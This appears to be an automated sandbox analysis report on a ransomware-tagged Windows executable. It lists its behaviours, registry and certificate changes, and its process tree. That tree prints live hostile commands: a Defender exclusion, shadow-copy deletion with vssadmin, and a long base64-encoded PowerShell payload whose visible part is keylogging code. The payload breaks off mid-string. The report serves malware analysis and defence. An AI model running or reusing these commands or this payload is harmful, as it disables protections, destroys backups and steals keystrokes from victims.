05afe90ae232227678223fd9c733567c7af155856284224e0e606fa634c42426

Analysis

max time kernel
150s
max time network
127s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
07/08/2023, 06:33

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

заявк.exe
Size

380KB
MD5

cc159da1d464234347c4d9e7c0c8ee4c
SHA1

fc2d07d3c0081e3ac1588796bb78abaefa43fb16
SHA256

0455097f6c81a896542bc23f0d96c0193f15973af30ae70658c64d523adbab64
SHA512

6386f807ffc2cdb67744821af2c4ac903997285ac3f2ac68de984a0a7654e32ec946bafd9e7721de1d00f2692b013f05be079609e938f0aafb8de5194c7c17cb
SSDEEP

6144:LOYGXaPNxdgSdcq2pVZPOJHAbKWeW0vZE0zY0xGmdF9/YBk5T:fGqN/XdctpVtkml0vaX03/ikp

Score

10^/10

persistence ransomware

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	2144	wscript.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	2144	powershell.exe	36

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1284	wscript.exe
5	1284	wscript.exe
7	1284	wscript.exe

Deletes itself 1 IoCs

pid	Process
1328	wscript.exe

Loads dropped DLL 1 IoCs

pid	Process
1432	regsvr32.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3056	vssadmin.exe

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\DynamicWrapperX	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Wow6432Node	regsvr32.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	wscript.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
592	powershell.exe
2900	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1328	wscript.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeBackupPrivilege	2924	vssvc.exe
Token: SeRestorePrivilege	2924	vssvc.exe
Token: SeAuditPrivilege	2924	vssvc.exe
Token: SeDebugPrivilege	2976	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2976	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1252 wrote to memory of 2364	1252	заявк.exe	28
PID 1252 wrote to memory of 2364	1252	заявк.exe	28
PID 1252 wrote to memory of 2364	1252	заявк.exe	28
PID 1252 wrote to memory of 2364	1252	заявк.exe	28
PID 2364 wrote to memory of 2900	2364	cmd.exe	30
PID 2364 wrote to memory of 2900	2364	cmd.exe	30
PID 2364 wrote to memory of 2900	2364	cmd.exe	30
PID 2364 wrote to memory of 2900	2364	cmd.exe	30
PID 2364 wrote to memory of 1328	2364	cmd.exe	32
PID 2364 wrote to memory of 1328	2364	cmd.exe	32
PID 2364 wrote to memory of 1328	2364	cmd.exe	32
PID 2364 wrote to memory of 1328	2364	cmd.exe	32
PID 1328 wrote to memory of 592	1328	wscript.exe	34
PID 1328 wrote to memory of 592	1328	wscript.exe	34
PID 1328 wrote to memory of 592	1328	wscript.exe	34
PID 1328 wrote to memory of 592	1328	wscript.exe	34
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 1432	1328	wscript.exe	38
PID 1328 wrote to memory of 3056	1328	wscript.exe	39
PID 1328 wrote to memory of 3056	1328	wscript.exe	39
PID 1328 wrote to memory of 3056	1328	wscript.exe	39
PID 1328 wrote to memory of 3056	1328	wscript.exe	39
PID 2976 wrote to memory of 2576	2976	powershell.exe	44
PID 2976 wrote to memory of 2576	2976	powershell.exe	44
PID 2976 wrote to memory of 2576	2976	powershell.exe	44
PID 2576 wrote to memory of 976	2576	csc.exe	45
PID 2576 wrote to memory of 976	2576	csc.exe	45
PID 2576 wrote to memory of 976	2576	csc.exe	45

C:\Users\Admin\AppData\Local\Temp\заявк.exe
"C:\Users\Admin\AppData\Local\Temp\заявк.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 445113777 239 "C:\Users\Admin\AppData\Local\Temp\заявк.exe")
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Windows\SysWOW64\wscript.exe
    wscript.exe /E:jscript 445113777 239 "C:\Users\Admin\AppData\Local\Temp\заявк.exe"
    3⤵
    - Deletes itself
    - Modifies registry class
    - Suspicious behavior: RenamesItself
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:592
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:1432
  - - C:\Windows\SysWOW64\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:3056

C:\Windows\SysWOW64\wscript.exe
C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\a858d4fe0.js" 239
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Modifies system certificate store
PID:1284

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGMAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABwADMAIABoADQAIAA9ACAAaAA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcAA2ACAAZQA3ACAAPQAgAGsAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABiADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGUAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGgAMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGMAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGgAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABkADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABhADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABnADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAaQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABvADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGEAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGUAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG4AMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGgAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABwADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGIAMQAwACAAcAAzADUAKQB7AGcAMQAxACAAPQAgAHAAMwA1ADsAZgAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AHAAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGcAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAHAAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAYQAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGcAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAZwAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAawAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGcAMgA0ACkAOwBpAGYAIAAoAGsAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABnADIANAApADsAbwAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAG8AMgA3ACkAIAAhAD0AIAAwACkAIABvADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBkADEAOAAgAD0AIAAiACIAOwBoADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGgAMQAzACkAOwBoADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAaAAxADMALAAgAGgAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAYwAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAaAAxADMALAAgAHIAZQBmACAAYwAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABnADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGMAMQA0ACkAOwBpAGYAIAAoAGcAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAaQAyADUAIAA9ACAAZwAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABpADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAZQA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAbwA5ACAAPQAgAG8AMwA5ACgAaAA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAbwA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwAzADkAKABwADMAIABoADQAKQB7AEkAbgB0AFAAdAByACAAYwA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGgANAAsACAAYwA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAGYANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8ANAAyACwAIABzAHQAcgBpAG4AZwAgAGIANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABvADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAGEAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBvADQANQBkAGEAdABhAF8AIAA9ACAAbwA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAbwA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGIANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAHAANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAGEAMgAxACwAIABvADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGUANAA2ACgASQBuAHQAUAB0AHIAIABhADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABhADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABwADMAKABpAG4AdAAgAGsANAA4ACwAIABJAG4AdABQAHQAcgAgAGgANAA5ACwAIABJAG4AdABQAHQAcgAgAGwANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAG